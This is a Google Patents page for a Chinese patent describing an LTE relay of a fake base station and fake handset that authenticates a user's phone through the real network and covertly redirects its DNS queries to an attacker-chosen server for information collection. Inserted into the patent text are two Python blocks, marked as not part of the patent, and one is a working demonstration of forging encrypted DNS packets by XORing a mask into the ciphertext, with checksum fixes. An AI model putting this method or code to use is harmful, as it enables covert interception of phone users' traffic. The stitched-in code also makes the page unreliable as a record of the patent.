CN110557753B - DNS redirection method based on relay access for public security network access - Google Patents
- Publication number: CN110557753B (application CN201910744712.7A)
- Authority: CN (China)
- Prior art keywords: private network, network, enb, public network, message
- Legal status: Active (the legal status is an assumption and is not a legal conclusion; Google has not performed a legal analysis and makes no representation as to the accuracy of the status listed)
Classifications
- H04L61/2589—NAT traversal over a relay server, e.g. traversal using relay for network address translation [TURN]
- H04W12/06—Authentication
- H04W12/40—Security arrangements using identity modules
- H04W16/26—Cell enhancers or enhancement, e.g. for tunnels, building shadow
- H04W40/22—Communication route or path selection, e.g. power-based or shortest path routing using selective relaying for reaching a BTS [Base Transceiver Station] or an access point
- H04W48/16—Discovering, processing access restriction or access information
- H04W74/002—Transmission of channel access control information
- H04W76/10—Connection setup
- H04L61/4511—Network directories; Name-to-address mapping using standardised directories; using standardised directory access protocols using domain name system [DNS]
- H04W88/04—Terminal devices adapted for relaying to or from another terminal or user
- Y02D30/70—Reducing energy consumption in communication networks in wireless communication networks
Abstract
The invention relates to the technical field of communication, in particular to a DNS redirection method based on relay access for public security network communication, which comprises the following steps: the initial attachment connection of the public network UE and the private network UE is established, the private network UE completes authentication relay access, and DNS redirection is carried out by modifying the transmitted data. The invention can effectively solve the problems of the prior art: complex DNS redirection operation, easy detection and discovery, and a low success rate.
Description
Technical Field
The invention relates to the technical field of communication, in particular to a DNS redirection method based on relay access for public security network communication.
Background
The public security network communication field has special requirements for the acquisition of user identity information, and user analysis and tracking using mobile terminal information based on an LTE electronic fence is of great value. In the prior art, the terminal is made to perform a TAU (Tracking Area Update) procedure by setting an abnormal TAC (Tracking Area Code); the complete TAU flow is modified so that, after the RRC connection is completed, an Identity Request NAS message is issued with the Security header type and Identity Request message identity values set so that the terminal reports its IMSI; the TAU is then refused, so that bidirectional authentication is avoided and the terminal reconnects to its original serving cell. The IMSI is the unique identity of the SIM card and is of great value for user information acquisition. In some special usage scenarios, basic identity information is far from sufficient; besides the IMSI, other identity information may be needed, such as data, telephone calls and short messages, so DNS redirection techniques are now commonly used.
In existing DNS redirection technology, the local DNS setting is modified by implanted software, so that the DNS requests of the user are redirected to a chosen target DNS server; or background code is implanted through a webpage, and when the user clicks on the webpage the local DNS setting is modified, with the same effect; or the original DNS settings of the router are overridden through a firmware vulnerability of the router, thereby affecting all users connected to the router and redirecting them to the target DNS.
In practical use the following problems occur: data transmission, and especially DNS redirection, is triggered passively; the address of the user's DNS server is modified by code implanted through a webpage or in the background of software, which requires the user to actively click on the webpage or install the software, so the method is easy to perceive and detect and its success rate is low; and with the method of overriding the original DNS settings of the router, the router the user is connected to is difficult to locate and gain access to.
Disclosure of Invention
In order to solve the above technical problems, the invention provides a DNS redirection method based on relay access for public security network access, which can effectively solve the problems of the prior art: complex DNS redirection operation, easy detection and discovery, and a low success rate.
The invention is realized by adopting the following technical scheme:
The DNS redirection method based on relay access for public security network communication is characterized in that information communication connections are established respectively between the public network UE and the private network eNB, between the private network eNB and the private network UE, and between the private network UE and the public network eNB, so that the initial attachment connection of the public network UE and the private network UE is established, the private network UE completes authentication relay access, and DNS redirection is carried out by modifying the transmitted data. DNS redirection by modification of the transmitted data specifically comprises:
a. the public network UE transmits the IP message to the private network eNB, and the private network eNB locates the DNS data packet after receiving the message, bypasses the encryption and modifies the message data;
b. the private network eNB sends the modified IP message data to the private network UE, the private network UE reports the request to the public network eNB, the private network eNB accesses the Internet through the core network, locates to the modified DNS server, resolves the IP address and returns to the private network eNB;
c. and the private network eNB forwards the IP address to the public network UE, and the public network UE accesses the target HTTP server through the IP address, so that DNS redirection is realized.
Bypassing the encryption to modify the message data specifically means: the sender and the receiver both use the same encryption algorithm to generate a keystream, and encryption and decryption are completed through an exclusive OR operation.
The initial attachment connection establishment of the public network UE specifically comprises the following steps:
(1) after the public network UE is powered on, it synchronizes to the physical downlink channel and starts searching for cells, judges whether the signal quality of a cell meets the requirement, selects a suitable cell, camps on it and carries out the attach procedure;
(2) the public network UE initiates random access request information, and after the private network eNB detects the information, the private network eNB sends a random access response message to the public network UE;
(3) after receiving the random access response message, the public network UE adjusts the uplink sending time according to the tracking area in the message and sends a radio resource control connection request message to the private network eNB;
(4) the private network eNB sends information for establishing radio resource bearing and information for configuring radio resources to public network UE;
(5) and the public network UE completes the radio resource bearing and the radio resource configuration and sends a radio resource control connection completion message to the private network eNB.
The private network UE completes the radio resource bearing and the radio resource configuration with the public network eNB by the same flow as the initial attachment connection of the public network UE.
The radio resource control connection completion message includes attachment request information of the non-access stratum.
The private network UE completing authentication relay access specifically comprises the following steps:
i. the private network eNB sends the attach request information sent by the public network UE, via the private network UE and the public network eNB, to the MME to start the authentication process, wherein the attach request information comprises the IMSI and the authentication request information;
ii. the MME reports the authentication request information to the HSS, and the HSS verifies the validity of the IMSI by querying its database, generates an authentication vector set AV and sends it to the MME;
iii. the MME extracts the random number RAND, the authentication token AUTN, the root key KASME and other data from the AV, at the same time allocates a key set identifier KSIASME for the root key KASME, and issues a user authentication request carrying the random number RAND, the authentication token AUTN, the root key KASME and other data to the private network UE;
iv. the data of the user authentication request is forwarded to the public network UE through the private network eNB; the public network UE calculates an expected message authentication code XMAC by extracting and computing over information such as the message authentication code MAC in the authentication token AUTN, compares whether XMAC equals MAC, and at the same time checks whether the sequence number SQN is in the normal range, thereby authenticating the accessed network; the calculated RES is then uploaded as the authentication response to the MME through the private network eNB, the private network UE and the public network eNB in sequence to finish the authentication process.
Before DNS redirection by modification of the transmitted data, the method further comprises:
I. the MME requests the establishment of a default bearer by sending an initial context setup request message to the public network eNB;
II. after receiving the initial context setup request message, if the public network eNB detects that the message does not contain the capability information of the public network UE, it issues a message to the private network UE to inquire about the capability of the public network UE; after the private network UE has inquired about the capability information of the public network UE through the private network eNB, the private network UE sends a message to the public network eNB reporting the capability information of the public network UE;
III. the public network eNB sends a security mode command message to the private network UE according to the security information supported by the public network UE, and security activation is carried out; the private network UE sends a security mode complete message to the public network eNB;
IV. the public network eNB sends radio resource connection reconfiguration information to the private network UE to carry out UE resource reconfiguration;
V. after the reconfiguration is finished, the private network UE returns a configuration success message to the public network eNB to finish the access flow.
Compared with the prior art, the invention has the beneficial effects that:
1. The invention places a relay node between the public network UE and the public network eNB; the relay node forwards messages one or more times, thereby realizing relay access to acquire more terminal identity information and solving the problem that the bidirectional authentication flow could not be carried out because the key cannot be acquired. Meanwhile, the relay node is divided into two parts, the private network UE and the private network eNB, with decoupled functions, so that they do not interfere with each other and later modules are easier to extend. In use, the private network eNB can be installed at a fixed position, while the private network UE is small and can be carried by hand and moved, conveniently receives information and parameter changes, and makes it more convenient to add or remove private network UE functions.
When DNS redirection is carried out on the transmitted data, the private network UE and the private network eNB are used, so that the IP data packets of the public network UE can be modified directly as they pass through the network; the triggering is active, the user is not required to perform any operation, the modification is not easily detected or discovered, and the success rate is higher. By carrying out DNS redirection through relay access, users can be induced to a freshly deployed HTTP server for user information collection.
2. The sender and the receiver both use the same encryption algorithm to generate a keystream, and encryption and decryption are completed through an exclusive OR operation; the original ciphertext can therefore be changed into the required ciphertext through a specific mask, which is simple to compute and improves the efficiency of modifying the message data.
Because the PDCP (packet data convergence protocol) layer only turns on encryption, without integrity protection, the IP data message is modified by bypassing the encryption algorithm to realize DNS redirection.
3. The public network UE connects to the private network eNB and the public network eNB connects to the private network UE; the private network UE and the private network eNB serve as relay nodes that proxy the public network UE's access to the public network core. Neither acquiring the encryption key nor cracking the encryption algorithm is required for the proxied UE to be admitted to the core network, so that relevant information can be intercepted and collected in subsequent data transmission.
Drawings
The invention will be described in further detail with reference to the drawings and detailed description, wherein:
FIG. 1 is a schematic view of the overall structure of the present invention;
fig. 2 is a schematic diagram of a relay access procedure according to the present invention;
Detailed Description
Example 1
As a basic embodiment of the present invention, referring to fig. 1 of the specification, the present invention includes a DNS redirection method based on relay access for public security network access, where information communication connection is respectively established between public network UE and private network eNB, private network eNB and private network UE, and private network UE and public network eNB, so that initial attachment connection establishment between public network UE and private network UE is completed, private network UE completes authentication relay access, and DNS redirection is performed for transmission data modification.
Wherein DNS redirection of the transmission data modification specifically comprises:
a. the public network UE transmits an IP message to the private network eNB; the private network eNB locates the DNS data packet after receiving the message, bypasses the encryption and modifies the message data; the sender and the receiver both use the same encryption algorithm to generate a keystream, and encryption and decryption are completed through an exclusive OR operation;
b. the private network eNB sends the modified IP message data to the private network UE, the private network UE reports the request to the public network eNB, the private network eNB accesses the Internet through the core network, locates to the modified DNS server, resolves the IP address and returns to the private network eNB;
c. and the private network eNB forwards the IP address to the public network UE, and the public network UE accesses the target HTTP server through the IP address, so that DNS redirection is realized.
The public network UE is a user terminal which needs to acquire related identity information; the public network eNB is a base station of a conventional operator; the private network eNB is a base station for enabling the public network UE to relay access; the private network UE is a terminal for simulating the public network UE to access the base station of the operator.
Example 2
As a preferred embodiment of the present invention, the present invention includes a DNS redirection method based on relay access for public security network access, in which information communication connection is respectively established between public network UE and private network eNB, private network eNB and private network UE, and private network UE and public network eNB, so that initial attachment connection establishment between public network UE and private network UE is completed, private network UE completes authentication relay access, and DNS redirection is performed for transmission data modification.
The initial attachment connection establishment of the public network UE specifically comprises the following steps:
(1) after the public network UE is powered on, PLMN (public land mobile network) selection is carried out first, then physical downlink channel synchronization is carried out to start searching for cells, in the order of intra-frequency cells, inter-frequency cells and inter-system cells; the public network UE still needs to judge whether the signal quality of a cell meets the requirement, determine whether it can camp on the cell, select a suitable cell according to the cell selection rules, then camp on it and carry out the attach procedure;
(2) the public network UE performs the attach procedure and first initiates random access request information, namely the MSG1 message; after detecting the MSG1 message, the private network eNB sends a random access response message, namely the MSG2 message, to the public network UE;
(3) after receiving the random access response, the public network UE adjusts its uplink transmission timing according to the tracking area in MSG2 and sends an RRCConnectionRequest (radio resource control connection request) message to the private network eNB;
(4) the private network eNB sends a radio resource control connection request message to the public network UE, wherein the message comprises SRB1 (radio resource bearer) bearer establishment information and radio resource configuration information;
(5) the public network UE completes the SRB1 bearer and radio resource configuration and sends an RRCConnectionSetupComplete message containing the Attach Request information of the non-access stratum to the private network eNB.
The private network UE repeats flow (1)-(5) and completes the radio resource bearer and radio resource allocation with the public network eNB.
Wherein DNS redirection of the transmission data modification specifically comprises:
a. the public network UE transmits an IP message to the private network eNB; the private network eNB locates the DNS data packet after receiving the message, bypasses the encryption and modifies the message data; the sender and the receiver both use the same encryption algorithm to generate a keystream, and encryption and decryption are completed through an exclusive OR operation;
b. the private network eNB sends the modified IP message data to the private network UE, the private network UE reports the request to the public network eNB, the private network eNB accesses the Internet through the core network, locates to the modified DNS server, resolves the IP address and returns to the private network eNB;
c. and the private network eNB forwards the IP address to the public network UE, and the public network UE accesses the target HTTP server through the IP address, so that DNS redirection is realized.
Example 3
As an optimal implementation manner of the present invention, referring to fig. 2 of the specification, the present invention includes a DNS redirection method based on relay access for public security network access, in which information communication connection is respectively established between public network UE and private network eNB, private network eNB and private network UE, and private network UE and public network eNB, so that initial attachment connection establishment between public network UE and private network UE is completed, private network UE completes authentication relay access, and DNS redirection is performed for transmission data modification.
The initial attachment connection establishment of the public network UE specifically comprises the following steps:
(1) after the public network UE is powered on, PLMN (public land mobile network) selection is carried out first, then physical downlink channel synchronization is carried out to start searching for cells, in the order of intra-frequency cells, inter-frequency cells and inter-system cells; the public network UE still needs to judge whether the signal quality of a cell meets the requirement, determine whether it can camp on the cell, select a suitable cell according to the cell selection rules, then camp on it and carry out the attach procedure;
(2) the public network UE performs the attach procedure and first initiates random access request information, namely the MSG1 message; after detecting the MSG1 message, the private network eNB sends a random access response message, namely the MSG2 message, to the public network UE;
(3) after receiving the random access response, the public network UE adjusts its uplink transmission timing according to the tracking area in MSG2 and sends an RRCConnectionRequest (radio resource control connection request) message to the private network eNB;
(4) the private network eNB sends a radio resource control connection request message to the public network UE, wherein the message comprises SRB1 (radio resource bearer) bearer establishment information and radio resource configuration information;
(5) the public network UE completes the SRB1 bearer and radio resource configuration and sends an RRCConnectionSetupComplete message containing the Attach Request information of the non-access stratum to the private network eNB.
The initial attachment connection establishment of the private network UE specifically comprises: the private network UE repeats flow (1)-(5) and completes the radio resource bearer and radio resource allocation with the public network eNB.
The private network UE completing authentication relay access specifically comprises the following steps:
i. the private network eNB sends the Attach Request (attachment request information) sent by the public network UE, via the private network UE, to the public network eNB and on to the public network MME, which starts the authentication process; the attach request information comprises the IMSI and the authentication request information;
ii. the public network MME reports the authentication request information to the public network HSS, and the public network HSS verifies the validity of the IMSI by querying its database, generates an authentication vector group AV and sends it to the public network MME;
iii. the public network MME extracts the random number RAND, the authentication token AUTN, the root key KASME and other data from the AV, at the same time allocates a key set identifier KSIASME for the root key KASME, and issues a user authentication request carrying the random number RAND, the authentication token AUTN, the root key KASME and other data to the private network UE;
iv. the private network UE transmits the data of the user authentication request to the public network UE through the private network eNB; the public network UE calculates an expected message authentication code XMAC by extracting and computing over information such as the message authentication code MAC in the authentication token AUTN, compares whether XMAC equals MAC, and at the same time checks whether the sequence number SQN is in the normal range, thereby authenticating the accessed network; the calculated RES is then uploaded as the authentication response to the MME through the private network eNB, the private network UE and the public network eNB in sequence to finish the authentication process;
v. the public network MME requests the establishment of a default bearer by sending an INITIAL CONTEXT SETUP REQUEST (initial context setup request) message to the public network eNB, wherein the default bearer setup includes the Attach Accept message of the non-access stratum (NAS) and the Activate Default EPS Bearer Context Request (activate core network context default bearer) message;
vi. after receiving the initial context setup request message, if the public network eNB detects that the message does not contain the capability information of the public network UE, it issues a message to the private network UE to inquire about the capability of the public network UE; after the private network UE has inquired about the capability information of the public network UE through the private network eNB, the private network UE sends a message to the public network eNB reporting the capability information of the public network UE;
vii. the public network eNB sends a SecurityModeCommand message to the private network UE according to the security information supported by the public network UE, so as to perform security activation, and after security activation is completed the private network UE returns a SecurityModeComplete message to the public network eNB;
viii. the public network eNB sends an RRCConnectionReconfiguration message to the private network UE to perform UE resource reconfiguration, including reconfiguration of SRB1 (radio resource bearer) and the radio resource configuration, establishment of SRB2 and the DRB (including the default bearer), etc.; after completion, the private network UE returns a configuration success message to the public network eNB to complete the access flow.
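The authentication steps i to iv above (and the same steps in the Disclosure section) describe the EPS-AKA exchange: the HSS derives an authentication vector from the subscriber key and SQN, the UE recomputes XMAC from AUTN and checks the SQN window before answering with RES, and the MME compares RES with XRES. The following is an added example, not code from the patent; it models only the HSS, UE and MME ends of that exchange, with HMAC-SHA256 stand-ins for the Milenage functions f1 to f5, a constructed subscriber key `K`, a simplified KASME derivation and a constructed SQN acceptance window (`SQN_WINDOW`), all of which are assumptions. The point it makes visible is which checks the UE itself performs and that the long-term key never leaves the SIM and the HSS.

```python
"""Toy EPS-AKA exchange: HSS issues an authentication vector, the UE verifies the
network (XMAC == MAC, SQN in range) and returns RES, the MME compares RES with XRES.
Added example; the Milenage functions are replaced by HMAC-SHA256 stand-ins."""
import hashlib
import hmac
import os
from dataclasses import dataclass
from typing import Optional, Tuple

# Constructed long-term key shared only by the SIM and the HSS (not a real key).
K = bytes.fromhex("465b5ce8b199b49faa5f0a2ee238a6bc")
# Constructed SQN acceptance window (assumption; 3GPP uses a more elaborate scheme).
SQN_WINDOW = 32


def _f(tag: bytes, key: bytes, *parts: bytes) -> bytes:
    """Keyed stand-in for the Milenage f1..f5 functions (assumption, not the real algorithm)."""
    h = hmac.new(key, tag, hashlib.sha256)
    for p in parts:
        h.update(p)
    return h.digest()


@dataclass
class AuthVector:
    rand: bytes
    autn: bytes
    xres: bytes
    k_asme: bytes


def hss_generate_av(k: bytes, sqn: int, amf: bytes = b"\x80\x00",
                    rand: Optional[bytes] = None) -> AuthVector:
    """HSS side: build (RAND, AUTN, XRES, KASME) for the subscriber's current SQN."""
    rand = rand if rand is not None else os.urandom(16)
    sqn_b = sqn.to_bytes(6, "big")
    mac = _f(b"f1", k, rand, sqn_b, amf)[:8]      # MAC over RAND, SQN, AMF
    xres = _f(b"f2", k, rand)[:8]                  # expected response
    ck = _f(b"f3", k, rand)[:16]
    ik = _f(b"f4", k, rand)[:16]
    ak = _f(b"f5", k, rand)[:6]                    # anonymity key hides SQN on the air
    conc_sqn = bytes(a ^ b for a, b in zip(sqn_b, ak))
    autn = conc_sqn + amf + mac                    # AUTN = (SQN xor AK) || AMF || MAC
    k_asme = _f(b"kdf", ck + ik, conc_sqn)         # simplified KASME derivation (assumption)
    return AuthVector(rand, autn, xres, k_asme)


def ue_authenticate(k: bytes, rand: bytes, autn: bytes,
                    last_sqn: int) -> Tuple[bool, Optional[bytes], str]:
    """UE side: recompute XMAC, compare with MAC, check SQN freshness, then compute RES."""
    conc_sqn, amf, mac = autn[:6], autn[6:8], autn[8:16]
    ak = _f(b"f5", k, rand)[:6]
    sqn_b = bytes(a ^ b for a, b in zip(conc_sqn, ak))
    xmac = _f(b"f1", k, rand, sqn_b, amf)[:8]
    if not hmac.compare_digest(xmac, mac):
        return False, None, "MAC failure"          # network could not prove knowledge of K
    sqn = int.from_bytes(sqn_b, "big")
    if not (last_sqn < sqn <= last_sqn + SQN_WINDOW):
        return False, None, "synch failure"        # replayed or out-of-window vector
    return True, _f(b"f2", k, rand)[:8], "ok"


def mme_verify(av: AuthVector, res: bytes) -> bool:
    """MME side: accept the UE only if RES matches XRES from the vector."""
    return hmac.compare_digest(av.xres, res)


def run_exchange(last_ue_sqn: int = 10, hss_sqn: int = 11, tamper_autn: bool = False) -> str:
    """Drive one exchange; tamper_autn flips a MAC bit to show the UE-side check firing."""
    av = hss_generate_av(K, hss_sqn)
    autn = av.autn
    if tamper_autn:
        autn = autn[:-1] + bytes([autn[-1] ^ 0x01])
    ok, res, reason = ue_authenticate(K, av.rand, autn, last_ue_sqn)
    if not ok:
        return reason
    return "attached" if mme_verify(av, res) else "RES rejected"


if __name__ == "__main__":
    print(run_exchange())                       # attached
    print(run_exchange(tamper_autn=True))       # MAC failure
    print(run_exchange(last_ue_sqn=50))         # synch failure
```

The three calls at the bottom exercise the normal case, a modified AUTN (rejected by the UE's XMAC comparison) and a stale SQN (rejected by the freshness check). What AKA binds is possession of `K` on both ends; it says nothing about which radio node carried the messages, which is why a network should additionally rely on PDCP integrity protection and, on the UE side, on the serving-network identity folded into KASME.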
Wherein DNS redirection of the transmission data modification specifically comprises:
a. The public network UE sends an IP packet to the private network eNB. On receiving it, the private network eNB locates the DNS packet and modifies its data without breaking the encryption: sender and receiver generate the same key stream KeyStream with the same encryption algorithm, and encryption and decryption are each a single exclusive-OR.
Let the transmitted plaintext be m and the ciphertext c. Encryption is KeyStream XOR m = c and decryption is KeyStream XOR c = m. To modify the message data, a chosen mask is XORed into the ciphertext c to obtain a ciphertext c', and decrypting c' yields a plaintext m'.
In formulas: mask XOR c = c'; KeyStream XOR c' = m'. A short derivation gives the mask that is needed:
m' XOR m = (KeyStream XOR c') XOR m
= (KeyStream XOR c') XOR (KeyStream XOR c)
= (KeyStream XOR mask XOR c) XOR (KeyStream XOR c)
= mask
That is, the required mask is the exclusive-OR of the original plaintext and the intended modified plaintext; the key stream itself is never needed. In a mobile data network the DNS servers used by one operator in one area are largely fixed and easy to learn, so the plaintext of a DNS request packet can be guessed closely. DNS redirection only requires changing the IP address in the DNS request, which sits at a fixed offset in the packet, so the bytes to modify are easy to locate.
The DNS request must first be found among the transmitted packets. Statistics show that the length of a DNS packet is clearly distinguishable from that of other frames, so a packet suspected to be a DNS request is modified and the following traffic is watched for a response: if a response arrives, the modified position was correct.
b. The private network eNB sends the modified IP packet to the private network UE, which reports the request to the public network eNB; from there the request reaches the Internet through the core network and arrives at the substituted DNS server, which resolves the name and returns the IP address, and the answer travels back to the private network eNB;
c. The private network eNB forwards that IP address to the public network UE, and the public network UE accesses the target HTTP server at that address, which completes the DNS redirection.
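The modification of step a and the derivation mask = m XOR m' above, carried out on a constructed IPv4/UDP DNS query, as an added example that is not part of the patent. It goes one step beyond the text in a way a practitioner needs: changing the destination address also changes the IPv4 header checksum and, when the sender enabled it, the UDP checksum (its pseudo-header covers the destination address), so the mask must cover those fields too. With the RFC 1624 incremental update the attacker needs only the old checksum values and the old destination address, which is consistent with the text's point that the plaintext at fixed offsets can be guessed. The keystream is random bytes standing in for the user-plane cipher output and is never used on the attacker side; addresses, ports, the query name and the option-free IPv4 layout are assumptions. The technique works because the cipher is a stream cipher and the user plane carries no integrity protection.

```python
"""Modifying an encrypted DNS query by XORing a mask into the ciphertext.

Added example, not code from the patent. The keystream is random bytes standing in
for the user-plane cipher output (never known to the attacker); addresses, ports,
the query name and all offsets assume IPv4 without options and UDP.
"""
import os
import socket
import struct

IP_HDR_LEN = 20


def ones_complement_sum(data: bytes) -> int:
    """RFC 1071 sum of 16-bit big-endian words, carries folded back into 16 bits."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return total


def checksum(data: bytes) -> int:
    return (~ones_complement_sum(data)) & 0xFFFF


def build_dns_query(src_ip: str, dst_ip: str, qname: str, txid: int = 0x1234) -> bytes:
    """Constructed sample datagram: IPv4 + UDP + DNS A query, both checksums filled in."""
    src, dst = socket.inet_aton(src_ip), socket.inet_aton(dst_ip)
    labels = b"".join(bytes([len(l)]) + l.encode() for l in qname.split("."))
    dns = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0) + labels + b"\x00" + struct.pack("!HH", 1, 1)
    udp_len = 8 + len(dns)
    udp = struct.pack("!HHHH", 40000, 53, udp_len, 0) + dns
    pseudo = src + dst + struct.pack("!BBH", 0, 17, udp_len)
    udp = udp[:6] + struct.pack("!H", checksum(pseudo + udp) or 0xFFFF) + udp[8:]
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, IP_HDR_LEN + udp_len, 0, 0x4000, 64, 17, 0, src, dst)
    ip = ip[:10] + struct.pack("!H", checksum(ip)) + ip[12:]
    return ip + udp


def incremental_checksum(old_csum: int, old_words: bytes, new_words: bytes) -> int:
    """RFC 1624 eq. 3, HC' = ~(~HC + ~m + m') per changed 16-bit word: needs only the old
    checksum and the old/new values of the words that change, not the rest of the header."""
    acc = (~old_csum) & 0xFFFF
    for (m,), (m_new,) in zip(struct.iter_unpack("!H", old_words), struct.iter_unpack("!H", new_words)):
        acc += ((~m) & 0xFFFF) + m_new
    while acc >> 16:
        acc = (acc & 0xFFFF) + (acc >> 16)
    return (~acc) & 0xFFFF


def xor_bytes(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def redirect_mask(pkt_len: int, old_dst_ip: str, new_dst_ip: str,
                  old_ip_csum: int, old_udp_csum: int) -> bytes:
    """mask = m XOR m', where m' is the same datagram re-addressed to new_dst_ip.

    Only three fields differ: the destination address (bytes 16..19), the IPv4 header
    checksum (bytes 10..11) and, if the sender enabled it, the UDP checksum (bytes 26..27),
    whose pseudo-header covers the destination address. The mask is zero elsewhere, so the
    DNS payload passes through untouched and no other plaintext is needed.
    """
    old_dst, new_dst = socket.inet_aton(old_dst_ip), socket.inet_aton(new_dst_ip)
    mask = bytearray(pkt_len)
    mask[16:20] = xor_bytes(old_dst, new_dst)
    mask[10:12] = struct.pack("!H", old_ip_csum ^ incremental_checksum(old_ip_csum, old_dst, new_dst))
    if old_udp_csum:  # 0 means the sender disabled the UDP checksum; nothing to fix
        new_udp_csum = incremental_checksum(old_udp_csum, old_dst, new_dst) or 0xFFFF
        mask[26:28] = struct.pack("!H", old_udp_csum ^ new_udp_csum)
    return bytes(mask)


def ip_checksum_ok(pkt: bytes) -> bool:
    return ones_complement_sum(pkt[:IP_HDR_LEN]) == 0xFFFF


def udp_checksum_ok(pkt: bytes) -> bool:
    udp = pkt[IP_HDR_LEN:]
    if udp[6:8] == b"\x00\x00":
        return True
    pseudo = pkt[12:20] + struct.pack("!BBH", 0, 17, len(udp))
    return ones_complement_sum(pseudo + udp) == 0xFFFF


def dst_ip(pkt: bytes) -> str:
    return socket.inet_ntoa(pkt[16:20])


def demo(new_dns_ip: str = "203.0.113.53") -> bytes:
    """UE sends an encrypted query to the operator resolver; the attacker patches the
    ciphertext only; the receiver's normal decryption yields the re-addressed datagram."""
    m = build_dns_query("192.0.2.10", "198.51.100.1", "example.com")
    keystream = os.urandom(len(m))  # cipher output; the attacker never sees it
    c = xor_bytes(keystream, m)
    # Attacker: has c plus the guessed plaintext of the changed fields (read from m here).
    old_ip_csum, old_udp_csum = struct.unpack("!HH", m[10:12] + m[26:28])
    mask = redirect_mask(len(c), "198.51.100.1", new_dns_ip, old_ip_csum, old_udp_csum)
    c_mod = xor_bytes(mask, c)
    return xor_bytes(keystream, c_mod)  # receiver decrypts as usual


if __name__ == "__main__":
    pkt = demo()
    print(dst_ip(pkt), ip_checksum_ok(pkt), udp_checksum_ok(pkt))
```

If the guessed destination address or checksum is wrong, the decrypted datagram carries a bad checksum and is silently dropped by the receiving IP stack, which is exactly the "no response observed" case the text uses to detect a wrong position.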
In view of the foregoing, it will be appreciated by those skilled in the art that, after reading the present specification, various other modifications can be made in accordance with the technical scheme and concepts of the present invention without the need for creative mental efforts, and the modifications are within the scope of the present invention.
Claims (5)
1. The DNS redirection method based on relay access for public security network communication is characterized in that: respectively establishing information communication connection between public network UE and private network eNB, private network eNB and private network UE and between private network UE and public network eNB, so that initial attachment connection establishment of the public network UE and the private network UE is completed, authentication relay access is completed by the private network UE, and DNS redirection is carried out on transmission data modification; wherein DNS redirection of the transmission data modification specifically comprises:
a. the public network UE transmits the IP message to the private network eNB, and the private network eNB locates the DNS data packet after receiving the message and bypasses encryption and modification of the message data;
b. the private network eNB sends the modified IP message data to the private network UE, the private network UE reports the request to the public network eNB, the private network eNB accesses the Internet through the core network, locates to the modified DNS server, resolves the IP address and returns to the private network eNB;
c. the private network eNB forwards the IP address to the public network UE, and the public network UE accesses the target HTTP server through the IP address, so that DNS redirection is realized;
the step a of bypassing the encryption and modifying message data specifically refers to: the sender and the receiver both use the same encryption algorithm to generate a key Key stream, and encryption and decryption are completed through exclusive OR operation;
before DNS redirection of the transmission data modification, further comprises:
i MME requests to establish default bearer by sending an initial context setting request message to a public network eNB;
after receiving the initial context setting request message, detecting that if the initial context setting request message does not contain the capability information of the public network UE, the public network eNB issues a message to the private network UE in sequence to inquire the capability of the public network UE, and after the private network UE inquires the capability information of the public network UE through the private network eNB, the private network UE sends the message to the public network eNB to report the capability information of the public network UE;
III, the public network eNB sends a security mode starting message to the private network UE according to security information supported by the public network UE, and security activation is carried out; the private network UE sends a security mode completion message to the public network eNB;
IV, the public network eNB sends radio resource connection reconfiguration information to the private network UE to carry out UE resource reconfiguration;
and V, after the reconfiguration is finished, the private network UE returns a configuration success message to the public network eNB to finish the access flow.
2. A DNS redirection method based on relay access for public security network traffic according to claim 1, wherein: the initial attachment connection establishment of the public network UE specifically comprises the following steps:
(1) after the public network UE is started, the physical downlink channel is synchronized to start searching the cell, whether the signal quality of the cell meets the requirement is judged, a proper cell is selected, and then the cell is resided and an attachment flow is carried out;
(2) the public network UE initiates random access request information, and after the private network eNB detects the information, the private network eNB sends a random access response message to the public network UE;
(3) after receiving the random access response message, the public network UE adjusts the uplink sending time according to the tracking area in the message and sends a radio resource control connection request message to the private network eNB;
(4) the private network eNB sends information for establishing radio resource bearing and information for configuring radio resources to public network UE;
(5) and the public network UE completes the radio resource bearing and the radio resource configuration and sends a radio resource control connection completion message to the private network eNB.
3. A DNS redirection method based on relay access for public security network access according to claim 2, characterized in that: the private network UE completes the radio resource bearing and the radio resource configuration with the public network eNB by the same flow as the initial attachment connection of the public network UE.
4. A DNS redirection method based on relay access for public security network traffic according to claim 3, characterized in that: the radio resource control connection completion message includes attachment request information of the non-access stratum.
5. The DNS redirection method based on relay access for public security network access according to claim 4, wherein: the private network UE completes authentication relay access specifically comprises the following steps:
the private network eNB sends the attachment request information sent by the public network UE to the public network eNB to the MME through the private network UE to start an authentication process, wherein the attachment request information comprises the IMSI and the authentication request information;
ii, the MME reports the authentication request information to the HSS, and the HSS verifies the validity of the IMSI by inquiring the database of the HSS and generates an authentication vector set AV to be sent to the MME;
iii, the MME extracts random number RAND, authentication token AUTN and root key KASME data from the AV, and simultaneously distributes a key identification KSIASME for the root key KASME, and the MME issues a user authentication request with the random number RAND, the authentication token AUTN and the root key KASME data to the private network UE;
and iv, forwarding the data of the user authentication request to the public network UE through the private network eNB, and the public network UE calculates an expected message authentication code XMAC by extracting and calculating message authentication code MAC information in an authentication token AUTN, compares whether the expected message authentication code XMAC is equal to the message authentication code MAC, simultaneously checks whether a sequence number SQN is in a normal range or not, is used for authenticating an accessed network, and uploads the calculated RES as an authentication response to the MME through the private network eNB, the private network UE and the public network eNB in sequence to finish an authentication process.
Priority Applications (1)
Application Number | Priority Date | Filing Date | Title |
---|---|---|---|
CN201910744712.7A CN110557753B (en) | 2019-08-13 | 2019-08-13 | DNS redirection method based on relay access for public security network access |
Publications (2)
Publication Number | Publication Date |
---|---|
CN110557753A CN110557753A (en) | 2019-12-10 |
CN110557753B true CN110557753B (en) | 2023-05-09 |
Family
ID=68737424
Country Status (1)
Country | Link |
---|---|
CN (1) | CN110557753B (en) |
Families Citing this family (1)
Publication number | Priority date | Publication date | Assignee | Title |
---|---|---|---|---|
US11729137B2 (en) | 2021-02-18 | 2023-08-15 | Samsung Electronics Co., Ltd. | Method and device for edge application server discovery |
Citations (2)
Publication number | Priority date | Publication date | Assignee | Title |
---|---|---|---|---|
CN103237342A (en) * | 2013-04-28 | 2013-08-07 | 哈尔滨工业大学 | Cross identity registration method for co-group users of time division-long term evolution-based (TD-LTE-based) public network and cluster |
CN109561430A (en) * | 2017-09-26 | 2019-04-02 | 大唐移动通信设备有限公司 | A kind of implementation method and equipment of public network user access private network |
Family Cites Families (5)
Publication number | Priority date | Publication date | Assignee | Title |
---|---|---|---|---|
